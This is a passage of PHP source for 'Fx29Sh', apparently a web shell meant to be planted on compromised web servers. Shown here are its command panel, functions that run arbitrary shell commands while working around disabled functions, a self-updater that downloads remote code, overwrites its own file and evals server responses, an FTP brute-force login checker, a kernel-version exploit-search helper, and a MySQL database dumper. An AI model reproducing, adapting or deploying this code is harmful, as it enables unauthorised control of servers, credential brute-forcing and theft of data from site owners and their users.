2531 function set_arg(txt1,txt2) {
2532 document.forms.fphpfsys.phpfsysfunc.value.selected = "Download";
2533 document.forms.fphpfsys.arg1.value = txt1;
2534 document.forms.fphpfsys.arg2.value = txt2;
2535 }
2536 function chg_arg(num,txt1,txt2) {
2537 if (num==0) {
2538 document.forms.fphpfsys.arg1.type = "hidden";
2539 document.forms.fphpfsys.A1.type = "hidden";
2540 }
2541 if (num<=1) {
2542 document.forms.fphpfsys.arg2.type = "hidden";
2543 document.forms.fphpfsys.A2.type = "hidden";
2544 }
2545 if (num==2) {
2546 document.forms.fphpfsys.A1.type = "label";
2547 document.forms.fphpfsys.A2.type = "label";
2548 document.forms.fphpfsys.arg1.type = "text";
2549 document.forms.fphpfsys.arg2.type = "text";
2550 }
2551 document.forms.fphpfsys.A1.value = txt1 + ":";
2552 document.forms.fphpfsys.A2.value = txt2 + ":";
2553 }
2554 </script>
2555 <form name="fphpfsys" method="POST">
2556 <input type="hidden" name="act" value="phpfsys">
2557 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2558 <select name="phpfsysfunc">
2559<?php
2560foreach ($phpfsaliases as $als) {
2561 if ($als[1]==@$phpfsysfunc) {
2562 echo "\t\t<option selected value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\n";
2563 }
2564 else {
2565 echo "\t\t<option value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','".@$als[4]."')\">".$als[0]."</option>\n";
2566 }
2567}
2568?>
2569 </select>
2570 <input type="label" name="A1" value="File:" size=2 disabled>
2571 <input type=text name=arg1 size=40 value="<?php echo @htmlspecialchars($arg1); ?>">
2572 <input type="hidden" name="A2" size=3 disabled >
2573 <input type="hidden" name="arg2" size=40 value="<?php echo @htmlspecialchars($arg2); ?>">
2574 <input type="submit" name="submit" value="Execute">
2575 </form>
2576 </td></tr>
2577 <tr><td>
2578<?php
2579foreach ($sh_sourcez as $e => $o) {
2580 echo "\t<input type=button value=\"$e\" onclick=\"set_arg('$o[0]','$o[1]')\">\n";
2581}
2582?>
2583 </td></tr>
2584
2585 <tr><th rowspan="4">Filesystem</th>
2586 <th>Search:</th>
2587 <td>
2588 <form name="f_search" method="POST">
2589 <input type="hidden" name="act" value="search">
2590 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2591 <input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
2592 </form>
2593 </td></tr>
2594 <tr><th>Upload:</th>
2595 <td>
2596 <form name="f_upload" method="POST" enctype="multipart/form-data">
2597 <input type="hidden" name="act" value="upload">
2598 <input type="file" name="uploadfile" size="50">
2599 <input type="submit" name="submit" value="Upload">
2600 <?php echo " Max size: ".@ini_get("upload_max_filesize")."B | Temp dir: ".@ini_get("upload_tmp_dir")."\n"; ?>
2601 </form>
2602 </td></tr>
2603 <tr><th>Create:</th>
2604 <td>
2605 <form name="f_mkfile" method="POST">
2606 <input type="hidden" name="act" value="mkfile">
2607 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2608 <input type="hidden" name="ft" value="edit">
2609 <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create">
2610 </form>
2611 </td></tr>
2612 <tr><th>View:</th><td>
2613 <form name="f_gofile" method="POST">
2614 <input type="hidden" name="act" value="gofile">
2615 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2616 <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> <input type="submit" value="View">
2617 </form>
2618 </td></tr>
2619</table>
2620
2621 <div class="bartitle footer"><?php echo html_footer(); ?></div>
2622
2623</div>
2624<!-- End of Commands Panel -->
2625
2626</center></body>
2627
2628</html>
2629<?php
2630########################
2631##[ Fx29Sh FUNCTIONS ]##
2632########################
2633function safemode() {
2634 if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
2635 else { return FALSE; }
2636}
2637function getdisfunc() {
2638 $disfunc = @ini_get("disable_functions");
2639 if (!empty($disfunc)) {
2640 $disfunc = str_replace(" ","",$disfunc);
2641 $disfunc = explode(",",$disfunc);
2642 }
2643 else { $disfunc= array(); }
2644 return $disfunc;
2645}
2646function enabled($func) {
2647 if ( function_exists($func) && is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
2648 else { return FALSE; }
2649}
2650##[ FX29EXEC W/ STDERR ]##
2651function fx29exec($cmd) {
2652 $output = "";
2653 if ( enabled("popen") ) {
2654 $h = popen($cmd.' 2>&1', 'r');
2655 if ( is_resource($h) ) {
2656 while ( !feof($h) ) { $output .= fread($h, 2096); }
2657 pclose($h);
2658 }
2659 }
2660 elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2661 elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2662 elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
2663 elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
2664 return $output;
2665}
2666##[ FX29EXEC W/O STDERR ]##
2667function fx29exec2($cmd) {
2668 $output = "";
2669 if ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
2670 elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
2671 elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); } #Dipindahkan kesini karena menimbulkan masalah pada output control
2672 elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2673 elseif ( enabled("popen") ) {
2674 $h = popen($cmd.' 2>&1', 'r');
2675 if ( is_resource($h) ) {
2676 while ( !feof($h) ) { $output .= fread($h, 2096); }
2677 pclose($h);
2678 }
2679 }
2680 return $output;
2681}
2682function is_windows() { return strtolower(substr(PHP_OS,0,3)) == "win"; }
2683function which($pr) {
2684 $path = fx29exec("which $pr");
2685 if(!empty($path)) { return $path; } else { return $pr; }
2686}
2687function get_status() {
2688 $arrfunc = array(
2689 array("MySQL","mysql_connect"),
2690 array("MSSQL","mssql_connect"),
2691 array("Oracle","ocilogon"),
2692 array("PostgreSQL","pg_connect"),
2693 array("Curl","curl_version"),
2694 );
2695 $arrcmd = array(
2696 array("Fetch","fetch --help"),
2697 array("Wget","wget --help"),
2698 array("Perl","perl -v"),
2699 );
2700
2701 $statinfo = array();
2702
2703 function showstat($sup,$stat) {
2704 if ($stat == "on") { return "$sup: <font class=on>ON</font>"; }
2705 else { return "$sup: <font class=off>OFF</font>"; }
2706 }
2707
2708 foreach ($arrfunc as $func) {
2709 if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); }
2710 else { $statinfo[] = showstat($func[0],"off"); }
2711 }
2712 $statinfo[] = (@extension_loaded('sockets')) ? showstat("Sockets","on") : showstat("Sockets","off");
2713 foreach ($arrcmd as $cmd) {
2714 if (fx29exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); }
2715 else { $statinfo[] = showstat($cmd[0],"off"); }
2716 }
2717 return implode(" ",$statinfo);
2718}
2719function showdisfunc() {
2720 $disfunc = getdisfunc();
2721 if ($disfunc = @ini_get("disable_functions")) {
2722 return '<font class="off">'.$disfunc.'</font>';
2723 }
2724 else { return '<font class="on">NONE</font>'; }
2725}
2726function disp_drives($curdir,$surl) {
2727 $letters = "";
2728 $v = explode("\\",$curdir);
2729 $v = $v[0];
2730 foreach (range("A","Z") as $letter) {
2731 $bool = $isdiskette = $letter == "A";
2732 if (!$bool) { $bool = is_dir($letter.":\\"); }
2733 if ($bool) {
2734 $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
2735 ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly!')\"":"")."> ";
2736 if ($letter.":" != $v) { $letters .= $letter; }
2737 else { $letters .= "<font color=#3366FF>".$letter."</font>"; }
2738 $letters .= " </a> ";
2739 }
2740 }
2741 if (!empty($letters)) { Return $letters; }
2742 else { Return "None"; }
2743}
2744function view_size($size) {
2745 if (!is_numeric($size)) { return FALSE; }
2746 else {
2747 if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
2748 elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
2749 elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
2750 else {$size = $size . " B";}
2751 return $size;
2752 }
2753}
2754function disp_freespace($curdrv) {
2755 $free = @disk_free_space($curdrv);
2756 $total = @disk_total_space($curdrv);
2757 if ($free === FALSE) { $free = 0; }
2758 if ($total === FALSE) { $total = 0; }
2759 if ($free < 0) { $free = 0; }
2760 if ($total < 0) { $total = 0; }
2761 $used = $total-$free;
2762 $free_percent = round(100/($total/$free),2)."%";
2763 $free = view_size($free);
2764 $total = view_size($total);
2765 return "$free of $total ($free_percent)";
2766}
2767##[ Fx29Sh UPDATE FUNCTIONS ]##
2768function fx29sh_getupdate($update = FALSE) {
2769 global $fx29sh_updateurl;
2770 $url = $fx29sh_updateurl."?version=".urlencode(base64_encode(sh_ver));
2771 $data = @file_get_contents($url);
2772 if (!$data) { return "<div class=errmsg>Can't connect to update-server! ($fx29sh_updateurl)</div>"; }
2773 else {
2774 $data = ltrim($data);
2775 if ($data{0} == "\x99" and $data{1} == "\x01") { return "You already using latest version!"; }
2776 if ($data{0} == "\x99" and $data{1} == "\x02") {
2777 $string = substr($data,3,ord($data{2}));
2778 $string = explode("|",$string);
2779 if ($update) {
2780 $confvars = array();
2781 $sourceurl = $string[0];
2782 $source = @file_get_contents($sourceurl);
2783 if (!$source) { return "Can't fetch update!"; }
2784 else {
2785 $fp = @fopen(__FILE__,"w");
2786 if (!$fp) { return "Local error: can't write update to ".__FILE__."! You may download fx29shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>."; }
2787 else {
2788 fwrite($fp,$source);
2789 fclose($fp);
2790 return "Update completed!";
2791 }
2792 }
2793 }
2794 else { return "New version is available: ".$string[1]; }
2795 }
2796 elseif ($data{0} == "\x99" and $data{1} == "\x03") { eval($string); return TRUE; }
2797 else { return "<div class=errmsg>Error in protocol: segmentation failed! (".$data.")</div>"; }
2798 }
2799}
2800##[ END Fx29Sh UPDATE FUNCTIONS ]##
2801function fx29_buff_prepare() {
2802 global $sess_data, $act;
2803 foreach ($sess_data["copy"] as $k=>$v) {
2804 $sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));
2805 }
2806 foreach ($sess_data["cut"] as $k=>$v) {
2807 $sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));
2808 }
2809 $sess_data["copy"] = array_unique($sess_data["copy"]);
2810 $sess_data["cut"] = array_unique($sess_data["cut"]);
2811 sort($sess_data["copy"]);
2812 sort($sess_data["cut"]);
2813 if ($act != "copy") {
2814 foreach ($sess_data["cut"] as $k=>$v) {
2815 if ($sess_data["copy"][$k] == $v) { unset($sess_data["copy"][$k]); }
2816 }
2817 }
2818 else {
2819 foreach ($sess_data["copy"] as $k=>$v) {
2820 if ($sess_data["cut"][$k] == $v) { unset($sess_data["cut"][$k]); }
2821 }
2822 }
2823}
2824function fx29_sess_put($data) {
2825 global $sess_cookie;
2826 global $sess_data;
2827 fx29_buff_prepare();
2828 $sess_data = $data;
2829 $data = serialize($data);
2830 setcookie($sess_cookie,$data);
2831}
2832##[ FILESYSTEM FUNCTIONS ]##
2833function fs_copy_dir($d,$t) {
2834 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
2835 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2836 $h = opendir($d);
2837 while (($o = readdir($h)) !== FALSE) {
2838 if (($o != ".") and ($o != "..")) {
2839 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
2840 else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
2841 if (!$ret) {return $ret;}
2842 }
2843 }
2844 closedir($h);
2845 return TRUE;
2846}
2847function fs_copy_obj($d,$t) {
2848 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
2849 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
2850 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
2851 if (is_dir($d)) {
2852 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2853 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
2854 return fs_copy_dir($d,$t);
2855 }
2856 elseif (is_file($d)) { return copy($d,$t); }
2857 else { return FALSE; }
2858}
2859function fs_move_dir($d,$t) {
2860 $h = opendir($d);
2861 if (!is_dir($t)) {mkdir($t);}
2862 while (($o = readdir($h)) !== FALSE) {
2863 if (($o != ".") and ($o != "..")) {
2864 $ret = TRUE;
2865 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
2866 else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
2867 if (!$ret) {return $ret;}
2868 }
2869 }
2870 closedir($h);
2871 return TRUE;
2872}
2873function fs_move_obj($d,$t) {
2874 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
2875 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
2876 if (is_dir($d)) {
2877 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2878 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
2879 return fs_move_dir($d,$t);
2880 }
2881 elseif (is_file($d)) {
2882 if(copy($d,$t)) {return unlink($d);}
2883 else {unlink($t); return FALSE;}
2884 }
2885 else {return FALSE;}
2886}
2887function fs_rmdir($d) {
2888 $h = opendir($d);
2889 while (($o = readdir($h)) !== FALSE) {
2890 if (($o != ".") and ($o != "..")) {
2891 if (!is_dir($d.$o)) {unlink($d.$o);}
2892 else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
2893 }
2894 }
2895 closedir($h);
2896 rmdir($d);
2897 return !is_dir($d);
2898}
2899function fs_rmobj($o) {
2900 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
2901 if (is_dir($o)) {
2902 if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
2903 return fs_rmdir($o);
2904 }
2905 elseif (is_file($o)) {return unlink($o);}
2906 else {return FALSE;}
2907}
2908##[ END FILESYSTEM FUNCTIONS ]##
2909##[ FX29SH EXIT FUNCTIONS ]##
2910function fx29shexit() {
2911 global $gzipencode,$ft;
2912 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
2913 $v = @ob_get_contents();
2914 @ob_end_clean();
2915 @ob_start("ob_gzHandler");
2916 echo $v;
2917 @ob_end_flush();
2918 }
2919 exit;
2920}
2921##[ END OF FX29SH EXIT FUNCTIONS ]##
2922function fx29fsearch($d) {
2923 global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a;
2924 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2925 $h = opendir($d);
2926 while (($f = readdir($h)) !== FALSE) {
2927 if($f != "." && $f != "..") {
2928 $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
2929 if (is_dir($d.$f)) {
2930 $search_i_d++;
2931 if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
2932 if (!is_link($d.$f)) { fx29fsearch($d.$f); }
2933 }
2934 else {
2935 $search_i_f++;
2936 if ($bool) {
2937 if (!empty($a["text"])) {
2938 $r = @file_get_contents($d.$f);
2939 if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
2940 if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
2941 if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
2942 else {$bool = strpos(" ".$r,$a["text"],1);}
2943 if ($a["text_not"]) {$bool = !$bool;}
2944 if ($bool) {$found[] = $d.$f; $found_f++;}
2945 }
2946 else {$found[] = $d.$f; $found_f++;}
2947 }
2948 }
2949 }
2950 }
2951 closedir($h);
2952}
2953function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);}
2954function view_perms_color($o) {
2955 if (!is_readable($o)) { return "<font class=red>".view_perms(fileperms($o))."</font>"; }
2956 elseif (!is_writable($o)) { return "<font color=white>".view_perms(fileperms($o))."</font>"; }
2957 else { return "<font color=green>".view_perms(fileperms($o))."</font>"; }
2958}
2959function view_perms($mode) {
2960 if (($mode & 0xC000) === 0xC000) {$type = "s";}
2961 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
2962 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
2963 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
2964 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
2965 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
2966 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
2967 else {$type = "?";}
2968 $owner["read"] = ($mode & 00400)?"r":"-";
2969 $owner["write"] = ($mode & 00200)?"w":"-";
2970 $owner["execute"] = ($mode & 00100)?"x":"-";
2971 $group["read"] = ($mode & 00040)?"r":"-";
2972 $group["write"] = ($mode & 00020)?"w":"-";
2973 $group["execute"] = ($mode & 00010)?"x":"-";
2974 $world["read"] = ($mode & 00004)?"r":"-";
2975 $world["write"] = ($mode & 00002)? "w":"-";
2976 $world["execute"] = ($mode & 00001)?"x":"-";
2977 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
2978 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
2979 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
2980 return $type.join("",$owner).join("",$group).join("",$world);
2981}
2982function parsesort($sort) {
2983 $one = intval($sort);
2984 $second = substr($sort,-1);
2985 if ($second != "d") {$second = "a";}
2986 return array($one,$second);
2987}
2988function parse_perms($mode) {
2989 if (($mode & 0xC000) === 0xC000) {$t = "s";}
2990 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
2991 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
2992 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
2993 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
2994 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
2995 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
2996 else {$t = "?";}
2997 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
2998 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
2999 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
3000 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
3001}
3002function str2mini($content,$len) {
3003 if (strlen($content) > $len) {
3004 $len = ceil($len/2) - 2;
3005 return substr($content, 0,$len)."...".substr($content,-$len);
3006 } else { return $content; }
3007}
3008function strips(&$arr,$k="") {
3009 if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } }
3010 else { $arr = stripslashes($arr); }
3011}
3012function getmicrotime() {
3013 list($usec, $sec) = explode(" ", microtime());
3014 return ((float)$usec + (float)$sec);
3015}
3016function milw0rm() {
3017 $Lversion = php_uname("r");
3018 $OSV = php_uname("s");
3019 if(eregi("Linux",$OSV)) {
3020 $Lversion = substr($Lversion,0,6);
3021 return "http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
3022 } else {
3023 $Lversion = substr($Lversion,0,3);
3024 return "http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
3025 }
3026}
3027function fx29ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
3028 if ($fqb_onlywithsh) { $TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin"))); }
3029 else { $TRUE = TRUE; }
3030 if ($TRUE) {
3031 $sock = @ftp_connect($host,$port,$timeout);
3032 if (@ftp_login($sock,$login,$pass)) {
3033 echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
3034 @ob_flush();
3035 return TRUE;
3036 }
3037 }
3038}
3039if (!enabled("posix_getpwuid")) { function posix_getpwuid($uid) { return FALSE; } }
3040if (!enabled("posix_getgrgid")) { function posix_getgrgid($gid) { return FALSE; } }
3041if (!enabled("posix_kill")) { function posix_kill($gid) { return FALSE; } }
3042##[ MySQL FUNCTIONS ]##
3043function mysql_dump($set) {
3044 $sock = $set["sock"];
3045 $db = $set["db"];
3046 $print = $set["print"];
3047 $nl2br = $set["nl2br"];
3048 $file = $set["file"];
3049 $add_drop = $set["add_drop"];
3050 $tabs = $set["tabs"];
3051 $onlytabs = $set["onlytabs"];
3052 $ret = array();
3053 $ret["err"] = array();
3054 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
3055 if (empty($db)) {$db = "db";}
3056 if (empty($print)) {$print = 0;}
3057 if (empty($nl2br)) {$nl2br = 0;}
3058 if (empty($add_drop)) {$add_drop = TRUE;}
3059 if (empty($file)) {
3060 $file = $tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
3061 }
3062 if (!is_array($tabs)) {$tabs = array();}
3063 if (empty($add_drop)) {$add_drop = TRUE;}
3064 if (sizeof($tabs) == 0) {
3065 #Retrieve tables-list
3066 $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
3067 if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
3068 }
3069 $out = "
3070 # Dumped by ".sh_name()."
3071 # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
3072 # Date: ".date("d.m.Y H:i:s")."
3073 # DB: \"".$db."\"
3074 #---------------------------------------------------------";
3075 $c = count($onlytabs);
3076 foreach($tabs as $tab) {
3077 if ((in_array($tab,$onlytabs)) or (!$c)) {
3078 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
3079 #Receieve query for create table structure
3080 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
3081 if (!$res) {$ret["err"][] = mysql_smarterror();}
3082 else {
3083 $row = mysql_fetch_row($res);
3084 $out .= $row["1"].";\n\n";
3085 #Receieve table variables
3086 $res = mysql_query("SELECT * FROM `$tab`", $sock);
3087 if (mysql_num_rows($res) > 0) {
3088 while ($row = mysql_fetch_assoc($res)) {
3089 $keys = implode("`, `", array_keys($row));
3090 $values = array_values($row);
3091 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
3092 $values = implode("', '", $values);
3093 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
3094 $out .= $sql;
3095 }
3096 }
3097 }
3098 }
3099 }
3100 $out .= "#---------------------------------------------------------------------------------\n\n";
3101 if ($file) {
3102 $fp = fopen($file, "w");
3103 if (!$fp) {$ret["err"][] = 2;}
3104 else {
3105 fwrite ($fp, $out);
3106 fclose ($fp);
3107 }
3108 }
3109 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
3110 return $out;
3111}
3112function mysql_buildwhere($array,$sep=" and",$functs=array()) {
3113 if (!is_array($array)) {$array = array();}
3114 $result = "";
3115 foreach($array as $k=>$v) {
3116 $value = "";
3117 if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
3118 $value .= "'".addslashes($v)."'";
3119 if (!empty($functs[$k])) {$value .= ")";}
3120 $result .= "`".$k."` = ".$value.$sep;
3121 }
3122 $result = substr($result,0,strlen($result)-strlen($sep));
3123 return $result;
3124}
3125function mysql_fetch_all($query,$sock) {
3126 if ($sock) {$result = mysql_query($query,$sock);}
3127 else {$result = mysql_query($query);}
3128 $array = array();
3129 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
3130 mysql_free_result($result);
3131 return $array;
3132}
3133function mysql_smarterror($sock) {
3134 if ($sock) { $error = mysql_error($sock); }
3135 else { $error = mysql_error(); }
3136 $error = htmlspecialchars($error);
3137 return $error;
3138}
3139function mysql_query_form() {
3140 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
3141 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
3142 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
3143 if ((!$submit) or ($sql_act)) {
3144 echo "<table><tr><td><form name=\"fx29sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
3145 if ($tbl_struct) {
3146 echo "<td valign=\"top\"><b>Fields:</b><br>";
3147 foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
3148 echo "</td></tr></table>";
3149 }
3150 }
3151 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
3152}
3153function mysql_create_db($db,$sock="") {
3154 $sql = "CREATE DATABASE `".addslashes($db)."`;";
3155 if ($sock) {return mysql_query($sql,$sock);}
3156 else {return mysql_query($sql);}
3157}
3158function mysql_query_parse($query) {
3159 $query = trim($query);
3160 $arr = explode (" ",$query);
3161 $types = array(
3162 "SELECT"=>array(3,1),
3163 "SHOW"=>array(2,1),
3164 "DELETE"=>array(1),
3165 "DROP"=>array(1)
3166 );
3167 $result = array();
3168 $op = strtoupper($arr[0]);
3169 if (is_array($types[$op])) {
3170 $result["propertions"] = $types[$op];
3171 $result["query"] = $query;
3172 if ($types[$op] == 2) {
3173 foreach($arr as $k=>$v) {
3174 if (strtoupper($v) == "LIMIT") {
3175 $result["limit"] = $arr[$k+1];
3176 $result["limit"] = explode(",",$result["limit"]);
3177 if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
3178 unset($arr[$k],$arr[$k+1]);
3179 }
3180 }
3181 }
3182 }
3183 else { return FALSE; }
3184}
3185##[ END OF MYSQL FUNCTIONS ]##
3186
3187##[ IMAGES ]##
3188function imagez() {
3189 $images = array(
3190 "home"=>
3191'R0lGODlhEwAYALMJAH6+91OZ97zp/l6x/Y/V/iVr7DGQ/QwxyAEKpP///wAAAAAAAAAAAAAAAAAA'.
3192'AAAAACH5BAHoAwkALAAAAAATABgAAASoMEkJwrwYAyEqyFkQcFwFTuJAkF1xDkExAARdAy4W4EUw'.
3193'zwAALEfhFQy+5AAWmwwLUIN0OhPlBjLocSpdDgzYBLYnjXa/U1fMQD6auWzxMQBmn0XpBJ6OB6fs'.
3194'cXwiPl5LBwgIdGqDhV4FiImBKV5CQQGQPjlgS0GVMJBfRD5BBDU1l4g+BxcGNqYEAQeHBasYBqW4'.
3195'sLK1IAUcK7onFwWlOMIZB0THyxgRADs=',
3196 "buffer"=>
3197'R0lGODlhGAAWALMJABo+qGql77zK4OPw+pXE9Tx33mOCxx5WzYyv4v///wAAAAAAAAAAAAAAAAAA'.
3198'AAAAACH5BAHoAwkALAAAAAAYABYAAASbMMlJa0LFao0QMZslDMJFEEGhhtPgul4gFwebvK9BICnN'.
3199'4oPOACU7HAAb3Gl4mtGQltfSdSI+AdAWVVlNGbHZmxTYVB3BUOCI2vR+AQaQZL1lz74GhEAgn48I'.
3200'bCg0BwV7ewh9AgSGgEM9ASOGe32NiwFMAY0ukgZhU1WaOHxhE0tTQCR9GksIqHyqG4qnQbAsAkK0'.
3201'NhsFiLq+NhEAOw==',
3202 "search"=>
3203'R0lGODlhGAAXAKIEAHl5ecbGxqCgoOvr6////wAAAAAAAAAAACH5BAHoAwQALAAAAAAYABcAAANq'.
3204'SLq88iK02UIM1kY67fgDhj3c4oGiKJRK9mUpycFpHQClHbw8zl2iEOjlo9SEw1DRuNsliaygMwlY'.
3205'di7PgcDKUD2moW1utAVAHtUS9maGmLkOTBiudrJZk3Uaz4gQ6XUYe3wNb4CEiImKCQA7',
3206 "back"=>
3207'R0lGODlhGAAYALMJAC9ILkesPbHdo3W0Zi2IJ+f141aOUTRoM4LKdP///wAAAAAAAAAAAAAAAAAA'.
